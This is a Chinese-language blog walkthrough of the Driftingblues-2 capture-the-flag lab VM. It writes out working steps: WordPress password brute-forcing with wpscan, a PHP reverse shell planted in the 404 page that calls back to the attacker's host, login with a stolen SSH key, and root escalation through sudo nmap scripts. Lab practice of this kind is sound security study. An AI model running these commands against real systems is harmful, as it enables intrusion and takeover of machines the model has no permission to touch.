freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Driftingblues-2靶机渗透详细过程
  • 关注
Driftingblues-2靶机渗透详细过程
2022-04-07 17:53:24
所属地 陕西省

前言提要

今天在打靶机的时候遇见了一个新问题:Vulnhub靶机检测不到IP地址。其原因也许是因为网卡服务启动失败。

所以这里也教一下大家当靶机探测不到IP地址的时候如何对靶机进行相关配置修改,也方便后续我再次遇见这种问题的时候知道如何操作。

解决步骤

因为靶机我们是不知道账号密码的,所以只能通过拯救模式进行操作

在开机时按下Shift键进入界面,再按e键,进入以下界面

image-20220402165037248

将ro 替换为 rw signie init=/bin/bash

同时按下Ctrl+X键,进入以下页面

查看当前网卡信息 ip a

image-20220402165351124

编辑网卡配置文件 vim /etc/network/interfacers,将靶机的网卡配置文件修改成上一步查看的对应网卡名称

image-20220402165331673

保存,瑞出,重启网卡服务 /etc/init .d/networking restart

查看IP状态,成功获取IP地址

信息收集

确定目标IP:192.168.132.160

nmap -A -sV -p- -T4 192.168.132.160

image-20220402165617502

自打靶机以来,第一次见FTP端口呢!

根据扫描结果,开放了21、22、80端口

21FTP端口探测

根据扫描信息知道,允许匿名登录

用户名:anontmous

密码:(空)

Ftp 192.168.132.160
ls
get secret.jpg
exit

里面也没什么东西倒是发现一张密码图片,将它下载下来

退出FTP

怀疑图片存在隐写

但是什么都没有

binwalk secret.jpg

image-20220402170057613

80端口

老规矩访问80端口的web页面

网页全是图片,源代码也没有隐藏东西

目录FUZZ尝试一波

dirb http://192.168.132.160

image-20220402170255332

发现一个blog页面,打开链接里面全是博客,并且发现该CMS是WordpPress

image-20220402170435333

随便点击进去一篇,IP转域名且无法访问

根据前面打DC靶机的经验,要修改hosts文件

vim /etc/hosts

再次隐藏目录FUZZ,发现后台登陆地址

使用wpscan进行账号密码爆破

wpscan --url http://driftingblues.box/blog -e u  

发现了登入账号:albert

爆破密码

wpscan --url http://driftingblues.box/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert

image-20220402170914246

爆破成功,进入后台

404页面反弹shell

全面浏览后台,找到反弹SHEELL的地方

image-20220402172104072

这是php反弹shell脚本

$ip="192.168.132.139";
$port=3333;
$sock=fsockopen($ip, $port);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

在kali监听shell

是在404页面写入,访问一个不存在的页面使得反弹shell执行

例如:http://driftingblues.box/blog/index.php/123

image-20220402172624792

成功并升级为交互式shell

在home下发现用户freddie,进入freddie发现一个user.txt但是无权限访问

ls -al

image-20220402172848112

22端口SSH

发现一个ssh登陆的rsa

把里面的密钥负责到我们本地的新建文件:id_rsa,然后进行登陆

image-20220402173720974

chmod 400 id_rsa
ssh freddie@192.168.33.140 -i id_rsa
sudo -l

image-20220402173822452

Nmap提权

image-20220402173858949

前面打DC靶机的时候在DC-6靶机提权使用的也是nmap提权

直接照搬命令

确定就是脚本命令执行后看不见自己输入的命令

# nmap提权:以root的权限用nmap执行这个脚本
echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell

image-20220402174138065

第二种nmap提权

image-20220402174243897

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

然后使用 python 切换 bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
或者直接输入bash

image-20220402174331918

知识总结

总体来说这也是一个简单的靶机,操作步骤大概为:

信息收集

21FTP端口探测(最终也没探测出来什么东西,那个图片也没有隐藏信息,不过给了第一次接触FTP的机会)

80端口探测,常规隐藏目录扫描,后台登陆账号密码爆破(CMS是Word press所以使用wpscan),接着后台全面浏览发现可以反弹shell的地方

反弹shell接收,进行目录和文件浏览在home下发现用户再进入到用户中探测

22SSH端口探测,因为是RSA所以权限是400(chmod 400)

nmap提权(回顾DC-6的提权)

完结,每次打靶机都会收获新知识!

# 渗透测试 # web安全 # 网络安全技术 # 靶机实战
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
解决步骤
    第二种nmap提权